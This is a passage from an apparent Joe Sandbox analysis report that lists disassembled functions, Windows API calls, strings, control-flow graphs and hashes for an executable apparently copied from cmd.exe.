                                                                                                            • Part of subcall function 00007FF7AB134A14: memmove.MSVCRT(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A9A
                                                                                                            • Part of subcall function 00007FF7AB134A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134AA2
                                                                                                            • Part of subcall function 00007FF7AB134AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AD6
                                                                                                            • Part of subcall function 00007FF7AB134AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AEF
                                                                                                            • Part of subcall function 00007FF7AB135554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7AB134E35), ref: 00007FF7AB1355DA
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135623
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135667
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB1356BE
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135702
                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E35
                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E81
                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134F69
                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134F95
                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FB0
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FC1
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FD8
                                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FF8
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135037
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13504B
                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB1350DF
                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB1350F2
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13510F
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135130
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13514A
                                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135175
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                          • API String ID: 1049357271-3021193919
                                                                                                          • Opcode ID: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                          • Instruction ID: 4a52ef6fa0e4acf9b8350bb3d9e3f83165947311791cc8e6d66f7248e5c593ea
                                                                                                          • Opcode Fuzzy Hash: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                          • Instruction Fuzzy Hash: 76C18431A0AA42C6EA4ABB1DF854179F7A0FF49B98FC65134D90E03375EF3DA4498320
                                                                                                          Function 00007FF7AB133C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 732 7ff7ab133c24-7ff7ab133c61 733 7ff7ab13ec5a-7ff7ab13ec5f 732->733 734 7ff7ab133c67-7ff7ab133c99 call 7ff7ab12af14 call 7ff7ab12ca40 732->734 733->734 736 7ff7ab13ec65-7ff7ab13ec6a 733->736 743 7ff7ab13ec97-7ff7ab13eca1 call 7ff7ab13855c 734->743 744 7ff7ab133c9f-7ff7ab133cb2 call 7ff7ab12b900 734->744 737 7ff7ab13412e-7ff7ab13415b call 7ff7ab138f80 736->737 744->743 749 7ff7ab133cb8-7ff7ab133cbc 744->749 750 7ff7ab133cbf-7ff7ab133cc7 749->750 750->750 751 7ff7ab133cc9-7ff7ab133ccd 750->751 752 7ff7ab133cd2-7ff7ab133cd8 751->752 753 7ff7ab133cda-7ff7ab133cdf 752->753 754 7ff7ab133ce5-7ff7ab133d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff7ab133faa-7ff7ab133fb3 753->755 756 7ff7ab133fb8 754->756 757 7ff7ab133d68-7ff7ab133d6c 754->757 755->752 759 7ff7ab133fc6-7ff7ab133fec GetLastError call 7ff7ab13855c call 7ff7ab13a5d6 756->759 757->756 758 7ff7ab133d72-7ff7ab133dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7ab133dd3-7ff7ab133ddd 758->760 762 7ff7ab133ff1-7ff7ab134007 call 7ff7ab13855c _local_unwind 759->762 760->762 763 7ff7ab133de3-7ff7ab133dfb 760->763 774 7ff7ab13400c-7ff7ab134022 GetLastError 762->774 765 7ff7ab1340fe-7ff7ab134119 call 7ff7ab13855c _local_unwind 763->765 766 7ff7ab133e01-7ff7ab133e11 763->766 777 7ff7ab13411a-7ff7ab13412c call 7ff7ab12ff70 call 7ff7ab13855c 765->777 766->765 770 7ff7ab133e17-7ff7ab133e28 766->770 773 7ff7ab133e2c-7ff7ab133e34 770->773 773->773 778 7ff7ab133e36-7ff7ab133e3f 773->778 775 7ff7ab134028-7ff7ab13402b 774->775 776 7ff7ab133e95-7ff7ab133e9c 774->776 775->776 780 7ff7ab134031-7ff7ab134047 call 7ff7ab13855c _local_unwind 775->780 781 7ff7ab133e9e-7ff7ab133ec2 call 7ff7ab132978 776->781 782 7ff7ab133ecf-7ff7ab133ed3 776->782 777->737 779 7ff7ab133e42-7ff7ab133e55 778->779 784 7ff7ab133e57-7ff7ab133e60 779->784 785 7ff7ab133e66-7ff7ab133e8f GetFileAttributesW 779->785 799 7ff7ab13404c-7ff7ab134062 call 7ff7ab13855c _local_unwind 780->799 793 7ff7ab133ec7-7ff7ab133ec9 781->793 788 7ff7ab133f08-7ff7ab133f0b 782->788 789 7ff7ab133ed5-7ff7ab133ef7 GetFileAttributesW 782->789 784->785 791 7ff7ab133f9d-7ff7ab133fa5 784->791 785->774 785->776 797 7ff7ab133f0d-7ff7ab133f11 788->797 798 7ff7ab133f1e-7ff7ab133f40 SetCurrentDirectoryW 788->798 794 7ff7ab134067-7ff7ab134098 GetLastError call 7ff7ab13855c _local_unwind 789->794 795 7ff7ab133efd-7ff7ab133f02 789->795 791->779 793->782 793->799 801 7ff7ab13409d-7ff7ab1340b3 call 7ff7ab13855c _local_unwind 794->801 795->788 795->801 803 7ff7ab133f46-7ff7ab133f69 call 7ff7ab13498c 797->803 804 7ff7ab133f13-7ff7ab133f1c 797->804 798->803 805 7ff7ab1340b8-7ff7ab1340de GetLastError call 7ff7ab13855c _local_unwind 798->805 799->794 801->805 815 7ff7ab1340e3-7ff7ab1340f9 call 7ff7ab13855c _local_unwind 803->815 816 7ff7ab133f6f-7ff7ab133f98 call 7ff7ab13417c 803->816 804->798 804->803 805->815 815->765 816->777
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                          • String ID: :
                                                                                                          • API String ID: 1809961153-336475711
                                                                                                          • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                          • Instruction ID: 9ace4cb69f23fcbb15aaca33579ab120419c80435ad67f83b6172f3893cc77ed
                                                                                                          • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                          • Instruction Fuzzy Hash: F4D1822270AB85C1EAA6EB19F4442B9F7A0FB85744F865135D94E437B4EF3CE449CB20
                                                                                                          Function 00007FF7AB132394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 914 7ff7ab132394-7ff7ab132416 memset call 7ff7ab12ca40 917 7ff7ab13241c-7ff7ab132453 GetModuleFileNameW call 7ff7ab13081c 914->917 918 7ff7ab13e0d2-7ff7ab13e0da call 7ff7ab134c1c 914->918 923 7ff7ab13e0db-7ff7ab13e0ee call 7ff7ab13498c 917->923 924 7ff7ab132459-7ff7ab132468 call 7ff7ab13081c 917->924 918->923 930 7ff7ab13e0f4-7ff7ab13e107 call 7ff7ab13498c 923->930 929 7ff7ab13246e-7ff7ab13247d call 7ff7ab13081c 924->929 924->930 935 7ff7ab132516-7ff7ab132529 call 7ff7ab13498c 929->935 936 7ff7ab132483-7ff7ab132492 call 7ff7ab13081c 929->936 937 7ff7ab13e10d-7ff7ab13e123 930->937 935->936 936->937 947 7ff7ab132498-7ff7ab1324a7 call 7ff7ab13081c 936->947 940 7ff7ab13e13f-7ff7ab13e17a _wcsupr 937->940 941 7ff7ab13e125-7ff7ab13e139 wcschr 937->941 945 7ff7ab13e17c-7ff7ab13e17f 940->945 946 7ff7ab13e181-7ff7ab13e199 wcsrchr 940->946 941->940 944 7ff7ab13e27c 941->944 949 7ff7ab13e283-7ff7ab13e29b call 7ff7ab13498c 944->949 948 7ff7ab13e19c 945->948 946->948 956 7ff7ab1324ad-7ff7ab1324c5 call 7ff7ab133c24 947->956 957 7ff7ab13e2a1-7ff7ab13e2c3 _wcsicmp 947->957 951 7ff7ab13e1a0-7ff7ab13e1a7 948->951 949->957 951->951 954 7ff7ab13e1a9-7ff7ab13e1bb 951->954 958 7ff7ab13e1c1-7ff7ab13e1e6 954->958 959 7ff7ab13e264-7ff7ab13e277 call 7ff7ab131300 954->959 964 7ff7ab1324ca-7ff7ab1324db 956->964 962 7ff7ab13e21a 958->962 963 7ff7ab13e1e8-7ff7ab13e1f1 958->963 959->944 969 7ff7ab13e21d-7ff7ab13e21f 962->969 965 7ff7ab13e201-7ff7ab13e210 963->965 966 7ff7ab13e1f3-7ff7ab13e1f6 963->966 967 7ff7ab1324e9-7ff7ab132514 call 7ff7ab138f80 964->967 968 7ff7ab1324dd-7ff7ab1324e4 ??_V@YAXPEAX@Z 964->968 965->962 973 7ff7ab13e212-7ff7ab13e218 965->973 966->965 972 7ff7ab13e1f8-7ff7ab13e1ff 966->972 968->967 969->949 971 7ff7ab13e221-7ff7ab13e228 969->971 975 7ff7ab13e22a-7ff7ab13e231 971->975 976 7ff7ab13e254-7ff7ab13e262 971->976 972->965 972->966 973->969 977 7ff7ab13e234-7ff7ab13e237 975->977 976->944 977->976 978 7ff7ab13e239-7ff7ab13e242 977->978 978->976 979 7ff7ab13e244-7ff7ab13e252 978->979 979->976 979->977
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                          • API String ID: 2622545777-4197029667
                                                                                                          • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                          • Instruction ID: 65450c51038dbd328c0ca5448bcab452235d59872ec484ed5fc78df8e183612b
                                                                                                          • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                          • Instruction Fuzzy Hash: A4919922B0A74285EE6AAB1CF8945F8A790FF48B48FC64135C54E476B5EF3CE509C760
                                                                                                          Function 00007FF7AB130580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                          • String ID: CMD.EXE
                                                                                                          • API String ID: 1606018815-3025314500
                                                                                                          • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                          • Instruction ID: fd468a8ac3c0bd59290ead3d8ac601759793f8a8d5efaa6724b2c7ccc334a540
                                                                                                          • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                          • Instruction Fuzzy Hash: A841C131A0B602CBE70A6B1CF895278FBA0BB8A759FC69235C50E43374DF3CA4549621
                                                                                                          Function 00007FF7AB12C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 992 7ff7ab12c620-7ff7ab12c66f GetConsoleTitleW 993 7ff7ab13c5f2 992->993 994 7ff7ab12c675-7ff7ab12c687 call 7ff7ab12af14 992->994 996 7ff7ab13c5fc-7ff7ab13c60c GetLastError 993->996 999 7ff7ab12c689 994->999 1000 7ff7ab12c68e-7ff7ab12c69d call 7ff7ab12ca40 994->1000 998 7ff7ab13c5e3 call 7ff7ab123278 996->998 1004 7ff7ab13c5e8-7ff7ab13c5ed call 7ff7ab13855c 998->1004 999->1000 1000->1004 1005 7ff7ab12c6a3-7ff7ab12c6ac 1000->1005 1004->993 1007 7ff7ab12c6b2-7ff7ab12c6c5 call 7ff7ab12b9c0 1005->1007 1008 7ff7ab12c954-7ff7ab12c95e call 7ff7ab13291c 1005->1008 1015 7ff7ab12c6cb-7ff7ab12c6ce 1007->1015 1016 7ff7ab12c9b5-7ff7ab12c9b8 call 7ff7ab135c6c 1007->1016 1013 7ff7ab13c5de-7ff7ab13c5e0 1008->1013 1014 7ff7ab12c964-7ff7ab12c972 call 7ff7ab1289c0 1008->1014 1013->998 1014->996 1024 7ff7ab12c978-7ff7ab12c99a towupper 1014->1024 1015->1004 1018 7ff7ab12c6d4-7ff7ab12c6e9 1015->1018 1023 7ff7ab12c9bd-7ff7ab12c9c9 call 7ff7ab13855c 1016->1023 1021 7ff7ab12c6ef-7ff7ab12c6fa 1018->1021 1022 7ff7ab13c616-7ff7ab13c620 call 7ff7ab13855c 1018->1022 1025 7ff7ab13c627 1021->1025 1026 7ff7ab12c700-7ff7ab12c713 1021->1026 1022->1025 1039 7ff7ab12c9d0-7ff7ab12c9d7 1023->1039 1029 7ff7ab12c9a0-7ff7ab12c9a9 1024->1029 1031 7ff7ab13c631 1025->1031 1030 7ff7ab12c719-7ff7ab12c72c 1026->1030 1026->1031 1029->1029 1034 7ff7ab12c9ab-7ff7ab12c9af 1029->1034 1035 7ff7ab13c63b 1030->1035 1036 7ff7ab12c732-7ff7ab12c747 call 7ff7ab12d3f0 1030->1036 1031->1035 1034->1016 1037 7ff7ab13c60e-7ff7ab13c611 call 7ff7ab14ec14 1034->1037 1042 7ff7ab13c645 1035->1042 1046 7ff7ab12c74d-7ff7ab12c750 1036->1046 1047 7ff7ab12c8ac-7ff7ab12c8af 1036->1047 1037->1022 1040 7ff7ab12c9dd-7ff7ab13c6da SetConsoleTitleW 1039->1040 1041 7ff7ab12c872-7ff7ab12c8aa call 7ff7ab13855c call 7ff7ab138f80 1039->1041 1040->1041 1051 7ff7ab13c64e-7ff7ab13c651 1042->1051 1052 7ff7ab12c76a-7ff7ab12c76d 1046->1052 1053 7ff7ab12c752-7ff7ab12c764 call 7ff7ab12bd38 1046->1053 1047->1046 1050 7ff7ab12c8b5-7ff7ab12c8d3 wcsncmp 1047->1050 1050->1052 1058 7ff7ab12c8d9 1050->1058 1059 7ff7ab13c657-7ff7ab13c65b 1051->1059 1060 7ff7ab12c80d-7ff7ab12c811 1051->1060 1056 7ff7ab12c840-7ff7ab12c84b call 7ff7ab12cb40 1052->1056 1057 7ff7ab12c773-7ff7ab12c77a 1052->1057 1053->1004 1053->1052 1077 7ff7ab12c84d-7ff7ab12c855 call 7ff7ab12cad4 1056->1077 1078 7ff7ab12c856-7ff7ab12c86c 1056->1078 1065 7ff7ab12c780-7ff7ab12c784 1057->1065 1058->1046 1059->1060 1061 7ff7ab12c817-7ff7ab12c81b 1060->1061 1062 7ff7ab12c9e2-7ff7ab12c9e7 1060->1062 1067 7ff7ab12ca1b-7ff7ab12ca1f 1061->1067 1068 7ff7ab12c821 1061->1068 1062->1061 1069 7ff7ab12c9ed-7ff7ab12c9f7 call 7ff7ab13291c 1062->1069 1070 7ff7ab12c78a-7ff7ab12c7a4 wcschr 1065->1070 1071 7ff7ab12c83d 1065->1071 1067->1068 1079 7ff7ab12ca25-7ff7ab13c6b3 call 7ff7ab123278 1067->1079 1073 7ff7ab12c824-7ff7ab12c82d 1068->1073 1086 7ff7ab12c9fd-7ff7ab12ca00 1069->1086 1087 7ff7ab13c684-7ff7ab13c698 call 7ff7ab123278 1069->1087 1075 7ff7ab12c7aa-7ff7ab12c7ad 1070->1075 1076 7ff7ab12c8de-7ff7ab12c8f7 1070->1076 1071->1056 1073->1073 1080 7ff7ab12c82f-7ff7ab12c837 1073->1080 1082 7ff7ab12c7b0-7ff7ab12c7b8 1075->1082 1083 7ff7ab12c900-7ff7ab12c908 1076->1083 1077->1078 1078->1039 1078->1041 1079->1004 1080->1065 1080->1071 1082->1082 1088 7ff7ab12c7ba-7ff7ab12c7c7 1082->1088 1083->1083 1089 7ff7ab12c90a-7ff7ab12c915 1083->1089 1086->1061 1093 7ff7ab12ca06-7ff7ab12ca10 call 7ff7ab1289c0 1086->1093 1087->1004 1088->1051 1094 7ff7ab12c7cd-7ff7ab12c7db 1088->1094 1095 7ff7ab12c93a-7ff7ab12c944 1089->1095 1096 7ff7ab12c917 1089->1096 1093->1061 1111 7ff7ab12ca16-7ff7ab13c67f GetLastError call 7ff7ab123278 1093->1111 1100 7ff7ab12c7e0-7ff7ab12c7e7 1094->1100 1103 7ff7ab12ca2a-7ff7ab12ca2f call 7ff7ab139158 1095->1103 1104 7ff7ab12c94a 1095->1104 1101 7ff7ab12c920-7ff7ab12c928 1096->1101 1106 7ff7ab12c7e9-7ff7ab12c7f1 1100->1106 1107 7ff7ab12c800-7ff7ab12c803 1100->1107 1108 7ff7ab12c92a-7ff7ab12c92f 1101->1108 1109 7ff7ab12c932-7ff7ab12c938 1101->1109 1103->1013 1104->1008 1106->1107 1112 7ff7ab12c7f3-7ff7ab12c7fe 1106->1112 1107->1042 1113 7ff7ab12c809 1107->1113 1108->1109 1109->1095 1109->1101 1111->1004 1112->1100 1112->1107 1113->1060
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleTitlewcschr
                                                                                                          • String ID: /$:
                                                                                                          • API String ID: 2364928044-4222935259
                                                                                                          • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                          • Instruction ID: 227b7eee1c5dd443d77245762dc61421dbb2f4786d64ac6fd2311f0bdfe25396
                                                                                                          • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                          • Instruction Fuzzy Hash: 67C1D461E0A642C1EA56BB1DF4142B9E2A1FF41B58FD68131CA1E472F5EF3CE446D320
                                                                                                          Function 00007FF7AB138D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
